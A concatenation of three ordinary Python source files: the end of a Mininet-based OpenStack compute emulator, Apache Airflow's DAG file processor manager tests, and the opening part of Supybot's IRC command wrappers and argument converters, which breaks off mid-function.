port = self.find_port_by_name_or_id(name_or_id)
if port is None:
raise Exception("Port with name or id %s does not exists." % name_or_id)
my_links = self.dc.net.links
for link in my_links:
if str(link.intf1) == port.intf_name and \
str(link.intf1.ip) == port.ip_address.split('/')[0]:
self._remove_link(link.intf1.node.name, link)
break
self.ports.pop(port.id, None)
for stack in self.stacks.values():
stack.ports.pop(port.name, None)
def _add_link(self, node_name, ip_address, link_name, net_name):
"""
Adds a new link between datacenter switch and the node with the given name.
:param node_name: Name of the required node.
:type node_name: ``str``
:param ip_address: IP-Address of the node.
:type ip_address: ``str``
:param link_name: Link name.
:type link_name: ``str``
:param net_name: Network name.
:type net_name: ``str``
"""
node = self.dc.net.get(node_name)
params = {'params1': {'ip': ip_address,
'id': link_name,
link_name: net_name},
'intfName1': link_name,
'cls': Link}
link = self.dc.net.addLink(node, self.dc.switch, **params)
OpenstackCompute.timeout_sleep(link.intf1.isUp, 1)
def _remove_link(self, server_name, link):
"""
Removes a link between server and datacenter switch.
:param server_name: Specifies the server where the link starts.
:type server_name: ``str``
:param link: A reference of the link which should be removed.
:type link: :class:`mininet.link`
"""
self.dc.switch.detach(link.intf2)
del self.dc.switch.intfs[self.dc.switch.ports[link.intf2]]
del self.dc.switch.ports[link.intf2]
del self.dc.switch.nameToIntf[link.intf2.name]
self.dc.net.removeLink(link=link)
for intf_key in self.dc.net[server_name].intfs.keys():
if self.dc.net[server_name].intfs[intf_key].link == link:
self.dc.net[server_name].intfs[intf_key].delete()
del self.dc.net[server_name].intfs[intf_key]
@staticmethod
def timeout_sleep(function, max_sleep):
"""
This function will execute a function all 0.1 seconds until it successfully returns.
Will return after `max_sleep` seconds if not successful.
:param function: The function to execute. Should return true if done.
:type function: ``function``
:param max_sleep: Max seconds to sleep. 1 equals 1 second.
:type max_sleep: ``float``
"""
current_time = time.time()
stop_time = current_time + max_sleep
while not function() and current_time < stop_time:
current_time = time.time()
time.sleep(0.1)
|
test_manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import pathlib
import random
import socket
import sys
import threading
import unittest
from datetime import datetime, timedelta
from tempfile import TemporaryDirectory
from unittest import mock
from unittest.mock import MagicMock, PropertyMock
import pytest
from freezegun import freeze_time
from airflow.configuration import conf
from airflow.dag_processing.manager import (
DagFileProcessorAgent,
DagFileProcessorManager,
DagFileStat,
DagParsingSignal,
DagParsingStat,
)
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.jobs.local_task_job import LocalTaskJob as LJ
from airflow.models import DagBag, DagModel, TaskInstance as TI
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, TaskCallbackRequest
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from tests.core.test_logging_config import SETTINGS_FILE_VALID, settings_context
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_dags, clear_db_runs, clear_db_serialized_dags
TEST_DAG_FOLDER = pathlib.Path(__file__).parent.parent / 'dags'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
class FakeDagFileProcessorRunner(DagFileProcessorProcess):
# This fake processor will return the zombies it received in constructor
# as its processing result w/o actually parsing anything.
def __init__(self, file_path, pickle_dags, dag_ids, callbacks):
super().__init__(file_path, pickle_dags, dag_ids, callbacks)
# We need a "real" selectable handle for waitable_handle to work
readable, writable = multiprocessing.Pipe(duplex=False)
writable.send('abc')
writable.close()
self._waitable_handle = readable
self._result = 0, 0
def start(self):
pass
@property
def start_time(self):
return DEFAULT_DATE
@property
def pid(self):
return 1234
@property
def done(self):
return True
@property
def result(self):
return self._result
@staticmethod
def _create_process(file_path, callback_requests, dag_ids, pickle_dags):
return FakeDagFileProcessorRunner(
file_path,
pickle_dags,
dag_ids,
callback_requests,
)
@property
def waitable_handle(self):
return self._waitable_handle
class TestDagFileProcessorManager(unittest.TestCase):
def setUp(self):
clear_db_runs()
def run_processor_manager_one_loop(self, manager, parent_pipe):
if not manager._async_mode:
parent_pipe.send(DagParsingSignal.AGENT_RUN_ONCE)
results = []
while True:
manager._run_parsing_loop()
while parent_pipe.poll(timeout=0.01):
obj = parent_pipe.recv()
if not isinstance(obj, DagParsingStat):
results.append(obj)
elif obj.done:
return results
raise RuntimeError("Shouldn't get here - nothing to read, but manager not finished!")
@conf_vars({('core', 'load_examples'): 'False'})
def test_max_runs_when_no_files(self):
child_pipe, parent_pipe = multiprocessing.Pipe()
with TemporaryDirectory(prefix="empty-airflow-dags-") as dags_folder:
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
manager = DagFileProcessorManager(
dag_directory=dags_folder,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
child_pipe.close()
parent_pipe.close()
@pytest.mark.backend("mysql", "postgres")
def test_start_new_processes_with_same_filepath(self):
"""
Test that when a processor already exist with a filepath, a new processor won't be created
with that filepath. The filepath will just be removed from the list.
"""
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
file_1 = 'file_1.py'
file_2 = 'file_2.py'
file_3 = 'file_3.py'
manager._file_path_queue = [file_1, file_2, file_3]
# Mock that only one processor exists. This processor runs with 'file_1'
manager._processors[file_1] = MagicMock()
# Start New Processes
manager.start_new_processes()
# Because of the config: '[scheduler] parsing_processes = 2'
# verify that only one extra process is created
# and since a processor with 'file_1' already exists,
# even though it is first in '_file_path_queue'
# a new processor is created with 'file_2' and not 'file_1'.
assert file_1 in manager._processors.keys()
assert file_2 in manager._processors.keys()
assert [file_3] == manager._file_path_queue
def test_set_file_paths_when_processor_file_path_not_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['missing_file.txt'] = mock_processor
manager._file_stats['missing_file.txt'] = DagFileStat(0, 0, None, None, 0)
manager.set_file_paths(['abc.txt'])
assert manager._processors == {}
def test_set_file_paths_when_processor_file_path_is_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['abc.txt'] = mock_processor
manager.set_file_paths(['abc.txt'])
assert manager._processors == {'abc.txt': mock_processor}
@conf_vars({("scheduler", "file_parsing_sort_mode"): "alphabetical"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_alphabetically(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test dag files are sorted alphabetically"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_1.py', 'file_2.py', 'file_3.py', 'file_4.py']
@conf_vars({("scheduler", "file_parsing_sort_mode"): "random_seeded_by_host"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_random_seeded_by_host(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are randomly sorted and seeded by host name"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
expected_order = dag_files
random.Random(get_hostname()).shuffle(expected_order)
assert manager._file_path_queue == expected_order
# Verify running it again produces same order
manager._file_paths = []
manager.prepare_file_path_queue()
assert manager._file_path_queue == expected_order
@conf_vars({("scheduler", "file_parsing_sort_mode"): "modified_time"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
@mock.patch("airflow.utils.file.os.path.getmtime")
def test_file_paths_in_queue_sorted_by_modified_time(
self, mock_getmtime, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are sorted by modified time"""
paths_with_mtime = {"file_3.py": 3.0, "file_2.py": 2.0, "file_4.py": 5.0, "file_1.py": 4.0}
dag_files = list(paths_with_mtime.keys())
mock_getmtime.side_effect = list(paths_with_mtime.values())
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_4.py', 'file_1.py', 'file_3.py', 'file_2.py']
@conf_vars({("scheduler", "file_parsing_sort_mode"): "modified_time"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
@mock.patch("airflow.utils.file.os.path.getmtime")
def test_recently_modified_file_is_parsed_with_mtime_mode(
self, mock_getmtime, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""
Test recently updated files are processed even if min_file_process_interval is not reached
"""
freezed_base_time = timezone.datetime(2020, 1, 5, 0, 0, 0)
initial_file_1_mtime = (freezed_base_time - timedelta(minutes=5)).timestamp()
dag_files = ["file_1.py"]
mock_getmtime.side_effect = [initial_file_1_mtime]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=3,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
# let's say the DAG was just parsed 2 seconds before the Freezed time
last_finish_time = freezed_base_time - timedelta(seconds=10)
manager._file_stats = {
"file_1.py": DagFileStat(1, 0, last_finish_time, 1.0, 1),
}
with freeze_time(freezed_base_time):
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
# File Path Queue will be empty as the "modified time" < "last finish time"
manager.prepare_file_path_queue()
assert manager._file_path_queue == []
# Simulate the DAG modification by using modified_time which is greater
# than the last_parse_time but still less than now - min_file_process_interval
file_1_new_mtime = freezed_base_time - timedelta(seconds=5)
file_1_new_mtime_ts = file_1_new_mtime.timestamp()
with freeze_time(freezed_base_time):
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
# File Path Queue will be empty as the "modified time" < "last finish time"
mock_getmtime.side_effect = [file_1_new_mtime_ts]
manager.prepare_file_path_queue()
# Check that file is added to the queue even though file was just recently passed
assert manager._file_path_queue == ["file_1.py"]
assert last_finish_time < file_1_new_mtime
assert (
manager._file_process_interval
> (freezed_base_time - manager.get_last_finish_time("file_1.py")).total_seconds()
)
def test_find_zombies(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
dagbag = DagBag(TEST_DAG_FOLDER, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('example_branch_operator')
dag.sync_to_db()
task = dag.get_task(task_id='run_this_first')
ti = TI(task, DEFAULT_DATE, State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.commit()
ti.job_id = local_job.id
session.add(ti)
session.commit()
manager._last_zombie_query_time = timezone.utcnow() - timedelta(
seconds=manager._zombie_threshold_secs + 1
)
manager._find_zombies()
requests = manager._callback_to_execute[dag.full_filepath]
assert 1 == len(requests)
assert requests[0].full_filepath == dag.full_filepath
assert requests[0].msg == "Detected as zombie"
assert requests[0].is_failure_callback is True
assert isinstance(requests[0].simple_task_instance, SimpleTaskInstance)
assert ti.dag_id == requests[0].simple_task_instance.dag_id
assert ti.task_id == requests[0].simple_task_instance.task_id
assert ti.execution_date == requests[0].simple_task_instance.execution_date
session.query(TI).delete()
session.query(LJ).delete()
@mock.patch('airflow.dag_processing.manager.DagFileProcessorProcess')
def test_handle_failure_callback_with_zombies_are_correctly_passed_to_dag_file_processor(
self, mock_processor
):
"""
Check that the same set of failure callback with zombies are passed to the dag
file processors until the next zombie detection logic is invoked.
"""
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
with conf_vars({('scheduler', 'parsing_processes'): '1', ('core', 'load_examples'): 'False'}):
dagbag = DagBag(test_dag_path, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('test_example_bash_operator')
dag.sync_to_db()
task = dag.get_task(task_id='run_this_last')
ti = TI(task, DEFAULT_DATE, State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.commit()
# TODO: If there was an actual Relationship between TI and Job
# we wouldn't need this extra commit
session.add(ti)
ti.job_id = local_job.id
session.commit()
expected_failure_callback_requests = [
TaskCallbackRequest(
full_filepath=dag.full_filepath,
simple_task_instance=SimpleTaskInstance(ti),
msg="Message",
)
]
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
child_pipe, parent_pipe = multiprocessing.Pipe()
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
fake_processors = []
def fake_processor_(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._create_process(*args, **kwargs)
fake_processors.append(processor)
return processor
mock_processor.side_effect = fake_processor_
manager = DagFileProcessorManager(
dag_directory=test_dag_path,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
if async_mode:
# Once for initial parse, and then again for the add_callback_to_queue
assert len(fake_processors) == 2
assert fake_processors[0]._file_path == str(test_dag_path)
assert fake_processors[0]._callback_requests == []
else:
assert len(fake_processors) == 1
assert fake_processors[-1]._file_path == str(test_dag_path)
callback_requests = fake_processors[-1]._callback_requests
assert {zombie.simple_task_instance.key for zombie in expected_failure_callback_requests} == {
result.simple_task_instance.key for result in callback_requests
}
child_pipe.close()
parent_pipe.close()
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.kill")
def test_kill_timed_out_processors_kill(self, mock_kill, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.min)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_kill.assert_called_once_with()
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess")
def test_kill_timed_out_processors_no_kill(self, mock_dag_file_processor, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.max)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_dag_file_processor.kill.assert_not_called()
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.execution_timeout(10)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_directory = TEST_DAG_FOLDER.parent / 'dags_with_system_exit'
# Delete the one valid DAG/SerializedDAG, and check that it gets re-created
clear_db_dags()
clear_db_serialized_dags()
child_pipe, parent_pipe = multiprocessing.Pipe()
manager = DagFileProcessorManager(
dag_directory=dag_directory,
dag_ids=[],
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
manager._run_parsing_loop()
result = None
while parent_pipe.poll(timeout=None):
result = parent_pipe.recv()
if isinstance(result, DagParsingStat) and result.done:
break
# Three files in folder should be processed
assert sum(stat.run_count for stat in manager._file_stats.values()) == 3
with create_session() as session:
assert session.query(DagModel).get(dag_id) is not None
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.backend("mysql", "postgres")
@pytest.mark.execution_timeout(30)
@mock.patch('airflow.dag_processing.manager.DagFileProcessorProcess')
def test_pipe_full_deadlock(self, mock_processor):
dag_filepath = TEST_DAG_FOLDER / "test_scheduler_dags.py"
child_pipe, parent_pipe = multiprocessing.Pipe()
# Shrink the buffers to exacerbate the problem!
for fd in (parent_pipe.fileno(),):
sock = socket.socket(fileno=fd)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
sock.detach()
exit_event = threading.Event()
# To test this behaviour we need something that continually fills the
# parent pipe's buffer (and keeps it full).
def keep_pipe_full(pipe, exit_event):
n = 0
while True:
if exit_event.is_set():
break
req = CallbackRequest(str(dag_filepath))
try:
logging.debug("Sending CallbackRequests %d", n + 1)
pipe.send(req)
except TypeError:
# This is actually the error you get when the parent pipe
# is closed! Nicely handled, eh?
break
except OSError:
break
n += 1
logging.debug(" Sent %d CallbackRequests", n)
thread = threading.Thread(target=keep_pipe_full, args=(parent_pipe, exit_event))
fake_processors = []
def fake_processor_(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._create_process(*args, **kwargs)
fake_processors.append(processor)
return processor
mock_processor.side_effect = fake_processor_
manager = DagFileProcessorManager(
dag_directory=dag_filepath,
dag_ids=[],
# A reasonable large number to ensure that we trigger the deadlock
max_runs=100,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
try:
thread.start()
# If this completes without hanging, then the test is good!
manager._run_parsing_loop()
exit_event.set()
finally:
logging.info("Closing pipes")
parent_pipe.close()
child_pipe.close()
thread.join(timeout=1.0)
class TestDagFileProcessorAgent(unittest.TestCase):
def setUp(self):
# Make sure that the configure_logging is not cached
self.old_modules = dict(sys.modules)
def tearDown(self):
# Remove any new modules imported during the test run. This lets us
# import the same source files for more than one test.
remove_list = []
for mod in sys.modules:
if mod not in self.old_modules:
remove_list.append(mod)
for mod in remove_list:
del sys.modules[mod]
@staticmethod
def _processor_factory(file_path, zombies, dag_ids, pickle_dags):
return DagFileProcessorProcess(file_path, pickle_dags, dag_ids, zombies)
def test_reload_module(self):
"""
Configure the context to have logging.logging_config_class set to a fake logging
class path, thus when reloading logging module the airflow.processor_manager
logger should not be configured.
"""
with settings_context(SETTINGS_FILE_VALID):
# Launch a process through DagFileProcessorAgent, which will try
# reload the logging module.
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path, 0, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
# Since we are reloading logging config not creating this file,
# we should expect it to be nonexistent.
assert not os.path.isfile(log_file_loc)
@conf_vars({('core', 'load_examples'): 'False'})
def test_parse_once(self):
clear_db_serialized_dags()
clear_db_dags()
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
processor_agent = DagFileProcessorAgent(test_dag_path, 1, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
while not processor_agent.done:
if not async_mode:
processor_agent.wait_until_finished()
processor_agent.heartbeat()
assert processor_agent.all_files_processed
assert processor_agent.done
with create_session() as session:
dag_ids = session.query(DagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
dag_ids = session.query(SerializedDagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
def test_launch_process(self):
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path, 0, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
assert os.path.isfile(log_file_loc)
|
commands.py
|
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# Copyright (c) 2009-2010, James Vega
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
Includes wrappers for commands.
"""
import time
import types
import getopt
import inspect
import threading
import supybot.log as log
import supybot.conf as conf
import supybot.utils as utils
import supybot.world as world
import supybot.ircdb as ircdb
import supybot.ircmsgs as ircmsgs
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
###
# Non-arg wrappers -- these just change the behavior of a command without
# changing the arguments given to it.
###
# Thread has to be a non-arg wrapper because by the time we're parsing and
# validating arguments, we're inside the function we'd want to thread.
def thread(f):
"""Makes sure a command spawns a thread when called."""
def newf(self, irc, msg, args, *L, **kwargs):
if world.isMainThread():
targetArgs = (self.callingCommand, irc, msg, args) + tuple(L)
t = callbacks.CommandThread(target=self._callCommand,
args=targetArgs, kwargs=kwargs)
t.start()
else:
f(self, irc, msg, args, *L, **kwargs)
return utils.python.changeFunctionName(newf, f.func_name, f.__doc__)
class UrlSnarfThread(world.SupyThread):
def __init__(self, *args, **kwargs):
assert 'url' in kwargs
kwargs['name'] = 'Thread #%s (for snarfing %s)' % \
(world.threadsSpawned, kwargs.pop('url'))
super(UrlSnarfThread, self).__init__(*args, **kwargs)
self.setDaemon(True)
def run(self):
try:
super(UrlSnarfThread, self).run()
except utils.web.Error, e:
log.debug('Exception in urlSnarfer: %s', utils.exnToString(e))
class SnarfQueue(ircutils.FloodQueue):
timeout = conf.supybot.snarfThrottle
def key(self, channel):
return channel
_snarfed = SnarfQueue()
class SnarfIrc(object):
def __init__(self, irc, channel, url):
self.irc = irc
self.url = url
self.channel = channel
def __getattr__(self, attr):
return getattr(self.irc, attr)
def reply(self, *args, **kwargs):
_snarfed.enqueue(self.channel, self.url)
return self.irc.reply(*args, **kwargs)
# This lock is used to serialize the calls to snarfers, so
# earlier snarfers are guaranteed to beat out later snarfers.
_snarfLock = threading.Lock()
def urlSnarfer(f):
"""Protects the snarfer from loops (with other bots) and whatnot."""
def newf(self, irc, msg, match, *L, **kwargs):
url = match.group(0)
channel = msg.args[0]
if not irc.isChannel(channel) or (ircmsgs.isCtcp(msg) and not
ircmsgs.isAction(msg)):
return
if ircdb.channels.getChannel(channel).lobotomized:
self.log.debug('Not snarfing in %s: lobotomized.', channel)
return
if _snarfed.has(channel, url):
self.log.info('Throttling snarf of %s in %s.', url, channel)
return
irc = SnarfIrc(irc, channel, url)
def doSnarf():
_snarfLock.acquire()
try:
# This has to be *after* we've acquired the lock so we can be
# sure that all previous urlSnarfers have already run to
# completion.
if msg.repliedTo:
self.log.debug('Not snarfing, msg is already repliedTo.')
return
f(self, irc, msg, match, *L, **kwargs)
finally:
_snarfLock.release()
if threading.currentThread() is not world.mainThread:
doSnarf()
else:
L = list(L)
t = UrlSnarfThread(target=doSnarf, url=url)
t.start()
newf = utils.python.changeFunctionName(newf, f.func_name, f.__doc__)
return newf
###
# Converters, which take irc, msg, args, and a state object, and build up the
# validated and converted args for the method in state.args.
###
# This is just so we can centralize this, since it may change.
def _int(s):
base = 10
if s.startswith('0x'):
base = 16
s = s[2:]
elif s.startswith('0b'):
base = 2
s = s[2:]
elif s.startswith('0') and len(s) > 1:
base = 8
s = s[1:]
try:
return int(s, base)
except ValueError:
if base == 10:
return int(float(s))
else:
raise
def getInt(irc, msg, args, state, type='integer', p=None):
try:
i = _int(args[0])
if p is not None:
if not p(i):
state.errorInvalid(type, args[0])
state.args.append(i)
del args[0]
except ValueError:
state.errorInvalid(type, args[0])
def getNonInt(irc, msg, args, state, type='non-integer value'):
try:
i = _int(args[0])
state.errorInvalid(type, args[0])
except ValueError:
state.args.append(args.pop(0))
def getLong(irc, msg, args, state, type='long'):
getInt(irc, msg, args, state, type)
state.args[-1] = long(state.args[-1])
def getFloat(irc, msg, args, state, type='floating point number'):
try:
state.args.append(float(args[0]))
del args[0]
except ValueError:
state.errorInvalid(type, args[0])
def getPositiveInt(irc, msg, args, state, *L):
getInt(irc, msg, args, state,
p=lambda i: i>0, type='positive integer', *L)
def getNonNegativeInt(irc, msg, args, state, *L):
getInt(irc, msg, args, state,
p=lambda i: i>=0, type='non-negative integer', *L)
def getIndex(irc, msg, args, state):
getInt(irc, msg, args, state, type='index')
if state.args[-1] > 0:
state.args[-1] -= 1
def getId(irc, msg, args, state, kind=None):
type = 'id'
if kind is not None and not kind.endswith('id'):
type = kind + ' id'
original = args[0]
try:
args[0] = args[0].lstrip('#')
getInt(irc, msg, args, state, type=type)
except Exception, e:
args[0] = original
raise
def getExpiry(irc, msg, args, state):
now = int(time.time())
try:
expires = _int(args[0])
if expires:
expires += now
state.args.append(expires)
del args[0]
except ValueError:
state.errorInvalid('number of seconds', args[0])
def getBoolean(irc, msg, args, state):
try:
state.args.append(utils.str.toBool(args[0]))
del args[0]
except ValueError:
state.errorInvalid('boolean', args[0])
def getNetworkIrc(irc, msg, args, state, errorIfNoMatch=False):
if args:
for otherIrc in world.ircs:
if otherIrc.network.lower() == args[0].lower():
state.args.append(otherIrc)
del args[0]
return
if errorIfNoMatch:
raise callbacks.ArgumentError
else:
state.args.append(irc)
def getHaveOp(irc, msg, args, state, action='do that'):
if not state.channel:
getChannel(irc, msg, args, state)
if state.channel not in irc.state.channels:
state.error('I\'m not even in %s.' % state.channel, Raise=True)
if not irc.state.channels[state.channel].isOp(irc.nick):
state.error('I need to be opped to %s.' % action, Raise=True)
def validChannel(irc, msg, args, state):
if irc.isChannel(args[0]):
state.args.append(args.pop(0))
else:
